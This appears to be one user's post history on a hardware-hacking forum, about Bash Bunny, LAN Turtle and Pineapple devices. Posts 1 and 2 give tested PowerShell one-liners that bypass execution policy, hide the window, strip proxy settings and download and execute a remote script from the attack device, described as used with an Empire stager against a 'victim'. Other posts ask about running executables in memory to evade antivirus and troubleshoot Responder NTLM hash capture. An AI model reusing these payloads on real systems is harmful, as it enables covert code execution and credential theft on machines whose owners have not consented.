cyb3rwr3ck's Achievements
  1. And this is it (works, according to a quick test):
     powershell -exec Bypass -noP "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {$p = [System.Net.WebProxy]::GetDefaultProxy(); $p.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; [System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy(); $w=(New-Object System.Net.WebClient).DownloadString('\\<BB_IN_HERE>\p.txt'); [System.Net.GlobalProxySelection]::Select = $p; IEX $w;exit}}"
     Store default proxy + creds to $p
     Clear proxy
     Retrieve script from BB to $w
     Select proxy settings from $p
     Run script with selected proxy settings
  2. Alright, had some time to check this out during the weekend. Invoke-Webrequest: the -NoProxy option seems to be part of PS >= v6, so it cannot reliably be found on the victim. This is how it should look if we want to first check an SMB share for connectivity and then download/execute a payload from it without using the system-wide proxy, in case of PS >= v6:
     powershell -exec Bypass -noP -WindowStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {IEX (Invoke-Webrequest -UseBasicParsing -Uri '\\<HOST_IN_HERE>\p.txt' -NoProxy);exit}}"
     Right now only this one is working reliably (PS < v6, proxy settings are applied):
     powershell -exec Bypass -noP -WindowStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {IEX (Invoke-Webrequest -UseBasicParsing -Uri '\\<HOST_IN_HERE>\p.txt');exit}}"
     The most portable, working solution to circumvent the proxy would be the following one. Of course it's way too long to fit into a WIN+R call, so it must be QUACKED to cmd or called from disk.
     powershell -exec Bypass -noP -WindowStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {[System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy(); IEX (New-Object System.Net.WebClient).DownloadString('\\<HOST_IN_HERE>\p.txt');exit}}"
     I have tested this stuff using an Empire stager. One open point is that the stager is also called without proxy settings, which will obviously break the attack in a restrictive environment where we want to retrieve the payload from the BB and reach out to the Internet to our C2 server using the explicit proxy. To me this is kind of strange because the stager does the proxy resolving stuff on its own. So, the new question is: how to reset the proxy settings to the system settings after retrieving the file from the BB? System.Net.GlobalProxySelection does not offer such a method.
  3. The thing is that the bunny presents a network to the host during this kind of "bring your own network" attack. So the proxy is utilized as long as there is no "direct" exception for exactly this bunny network configuration. This will create a connect request to the explicit proxy, which dies... The only thing that should fix this behavior is enforcing this kind of direct request, which - in an enterprise setup - is usually done by PAC files. I have no idea how to do it temporarily using PowerShell, so this is the goal to achieve.
  4. Hi there, I was wondering how the PowerShell-based bunny payloads that load PowerShell script files from either the SMB or the web service of the bunny could circumvent the system-wide proxy. The problem is that the proxy - obviously - is unable to connect to the bunny IP and the payload fails. The current versions of the payloads do not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the bunny and to use it in all other requests, which is the PowerShell default. I am currently unaware of a good solution to circumvent a system-wide proxy in PowerShell, especially without local admin. Any ideas? Best regards! F
  5. Has anybody already tried to convert the .exe to a string and run it in-memory via PowerShell to get rid of the AV problem?
  6. Sorry for the late reply! Actually what I was looking for was the integration of pluggable transports (https://www.torproject.org/docs/pluggable-transports.html.en#user), which should hide the traffic from all kinds of deep packet inspection. Bridges are also good, but as far as I understand your code only uses 'standard' Tor connections. The perfect combination would be bridges + PT (https://www.torproject.org/docs/bridges#PluggableTransports) to circumvent DPI and statically blocked entry guards. I will try to add the PT support asap. EDIT: I recognized that you also use obfs3. I will give it a try.
  7. I can confirm that ufw - which is part of Linux Mint 18 - also prevents me from running wp6.sh without locking down my connections. A "service ufw stop" before running the script, or in the "connectsaved" function, fixes the problem. @PaulFinch: Would you mind adding your code to GitHub or to this post? This might help others with the same problem without researching it first...
  8. Hmmm, I am facing the same issue. Factory reset of the turtle, opkg update, then configuration of the quickcreds module using the turtle shell. The log folders I see in the /etc/turtle/Responder/logs folder are linked to /root/loot as they should be, but there is nothing in them. On the wire I can see that the poisoning is working and Windows is using the faked proxy, which is asking for NTLM authentication. Anyway, no hashes are dumped to the turtle. I have tested the setup with a domain-joined Win 7 Pro and a stand-alone Win 10 Home.
  9. Hmm, sure I can build it myself. The question was whether anyone is aware of a cable with the correct power plug, a USB-A connector on the other side and a converter from 12V to 5V, to save the time assembling it. Best regards! F
  10. Hey there, I am thinking about getting a Nano because of its size and new interface, but my old Pineapple Juice 1800 is still in good condition. It offers 12V DC output and a "standard" power plug. Does anyone know if there is a cable/converter to convert the output to 5V and a USB-A plug? Thx in advance, F
  11. Hey Shad, thanks for the great module, it works perfectly for connecting back in using the hidden service! Wouldn't it be cool to have pluggable transports included to hide the Tor traffic from DPI and so forth? I am unfortunately not aware if this would be possible with the hidden service... Best regards!